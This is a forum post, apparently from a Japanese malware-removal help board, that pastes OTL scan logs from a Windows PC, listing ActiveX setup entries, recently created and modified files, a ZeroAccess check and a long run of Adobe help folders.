ActiveX:[b]64bit:[/b] {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX:[b]64bit:[/b] {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX:[b]64bit:[/b] {FEBEF00C-046D-438D-8A88-BF94A6C9E703} - .NET Framework
ActiveX:[b]64bit:[/b] >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX:[b]64bit:[/b] >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\System32\ie4uinit.exe -UserIconConfig
ActiveX:[b]64bit:[/b] >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
ActiveX: {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} - .NET Framework
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX: {23A20C3C-2ADD-4A80-AFB4-C146F8847D79} - .NET Framework
ActiveX: {26784146-6E05-3FF9-9335-786C7C0FB5BE} - .NET Framework
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles(x86)%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework
ActiveX: {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\SysWOW64\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\SysWOW64\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\iedkcs32.dll",BrandIEActiveSetup SIGNUP

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/09/12 10:35:26 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
[2015/09/11 09:30:58 | 001,800,104 | ---- | C] (Malwarebytes Corporation) -- C:\Users\【ユーザー名】\Desktop\JRT.exe
[2015/09/10 16:11:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Malwarebytes
[2015/09/10 16:11:10 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/09/10 01:22:17 | 000,000,000 | ---D | C] -- C:\Windows\SoftwareDistribution
[2015/09/09 14:52:24 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome アプリ
[2015/09/09 08:39:07 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2015/09/09 08:38:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Google
[2015/09/09 08:15:35 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\chorome
[2015/09/09 06:13:13 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\windows_update_fix
[2015/09/08 00:16:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\hjt・ccログ
[2015/09/07 23:41:07 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Geek Uninstaller
[2015/09/07 23:40:56 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\geek
[2015/09/07 23:23:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[2015/09/07 23:23:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2015/09/07 23:14:58 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2015/09/07 23:10:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java
[2015/09/07 23:10:14 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Sun
[2015/09/07 23:10:14 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\.oracle_jre_usage
[2015/09/07 15:01:16 | 000,000,000 | ---D | C] -- C:\7b8eb74e5d1154427c6e2dbc
[2015/09/07 14:46:03 | 000,000,000 | ---D | C] -- C:\Windows\CheckSur
[2015/09/06 16:26:49 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Windows Live Writer
[2015/09/06 16:26:49 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Windows Live Writer
[2015/09/06 15:56:49 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
[2015/09/06 15:56:39 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2015/09/06 15:53:36 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Super PC Cleaner
[2015/09/04 12:25:28 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
[2015/09/01 11:50:34 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\TS
[2015/08/30 09:53:44 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SeekerFunc
[2015/08/24 19:20:38 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SystemForce
[2015/08/24 15:09:30 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
[2015/08/24 15:08:32 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iTunes
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[2015/08/24 12:37:26 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\TaiG
[2015/08/18 13:56:19 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft OneDrive
[2015/08/18 13:56:16 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\OneDrive
[2015/08/18 13:55:52 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft OneDrive
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Documents\Bandicam

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/09/12 16:48:00 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/09/12 16:06:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/09/12 16:02:53 | 000,000,696 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA.job
[2015/09/12 15:48:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/09/12 10:35:35 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
[2015/09/12 00:02:08 | 000,000,644 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core.job
[2015/09/11 10:01:17 | 000,024,400 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/09/11 10:01:17 | 000,024,400 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/09/11 09:52:34 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015/09/11 09:52:30 | 3094,102,016 | -HS- | M] () -- C:\hiberfil.sys
[2015/09/11 09:31:03 | 001,800,104 | ---- | M] (Malwarebytes Corporation) -- C:\Users\【ユーザー名】\Desktop\JRT.exe
[2015/09/10 01:15:12 | 000,302,011 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\WindowsUpdateDiagnostic.diagcab
[2015/09/09 15:13:35 | 000,002,606 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\グランブルーファンタジー[ChromeApps版].lnk
[2015/09/09 08:43:59 | 000,002,265 | ---- | M] () -- C:\Users\【ユーザー名】\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/09/09 08:39:07 | 000,002,241 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/09/07 23:40:11 | 000,263,472 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2015/09/07 23:30:54 | 000,001,066 | ---- | M] () -- C:\Users\Public\Desktop\VLC media player.lnk
[2015/09/07 23:23:58 | 000,002,681 | ---- | M] () -- C:\Users\Public\Desktop\Skype.lnk
[2015/09/07 23:09:42 | 000,097,888 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2015/09/07 16:23:07 | 564,744,309 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\Windows6.1-KB947821-v34-x64.msu
[2015/09/07 13:31:21 | 002,582,815 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\geek.zip
[2015/09/06 15:56:49 | 000,000,826 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/09/04 12:25:44 | 000,001,139 | ---- | M] () -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
[2015/08/24 15:09:30 | 000,001,787 | ---- | M] () -- C:\Users\Public\Desktop\iTunes.lnk

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/09/10 01:15:05 | 000,302,011 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\WindowsUpdateDiagnostic.diagcab
[2015/09/09 15:13:35 | 000,002,606 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\グランブルーファンタジー[ChromeApps版].lnk
[2015/09/09 08:39:07 | 000,002,265 | ---- | C] () -- C:\Users\【ユーザー名】\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/09/09 08:39:07 | 000,002,241 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/09/07 16:13:27 | 564,744,309 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\Windows6.1-KB947821-v34-x64.msu
[2015/09/07 13:31:07 | 002,582,815 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\geek.zip
[2015/09/06 15:56:49 | 000,000,826 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/09/03 15:34:50 | 000,000,690 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/09/03 15:34:50 | 000,000,686 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/08/24 15:09:30 | 000,001,787 | ---- | C] () -- C:\Users\Public\Desktop\iTunes.lnk
[2015/08/18 13:56:19 | 000,002,094 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
[2015/05/18 17:32:28 | 000,000,000 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\Temp.dat
[2015/05/06 07:26:47 | 000,000,079 | ---- | C] () -- C:\Program Files (x86)\prefs.js
[2014/12/13 21:29:15 | 000,007,605 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\Resmon.ResmonCfg
[2014/08/08 10:28:32 | 000,226,680 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2014/08/08 10:28:30 | 000,076,152 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrA.exe
[2014/06/07 02:39:33 | 000,001,525 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\recently-used.xbel
[2014/05/23 00:34:21 | 000,000,347 | ---- | C] () -- C:\Users\【ユーザー名】\コンピューター - ショートカット.lnk
[2014/05/11 21:45:24 | 000,002,549 | ---- | C] () -- C:\Windows\wininit.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2009/07/14 13:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 14:22:33 | 014,177,280 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 14:26:18 | 012,875,264 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 10:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/21 12:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 10:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]
  • あすとろ
  • 2015/09/12 (Sat) 23:42:59
OTL3
The board will not accept a post that contains only alphanumeric characters, so this text is filler.

[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader\X
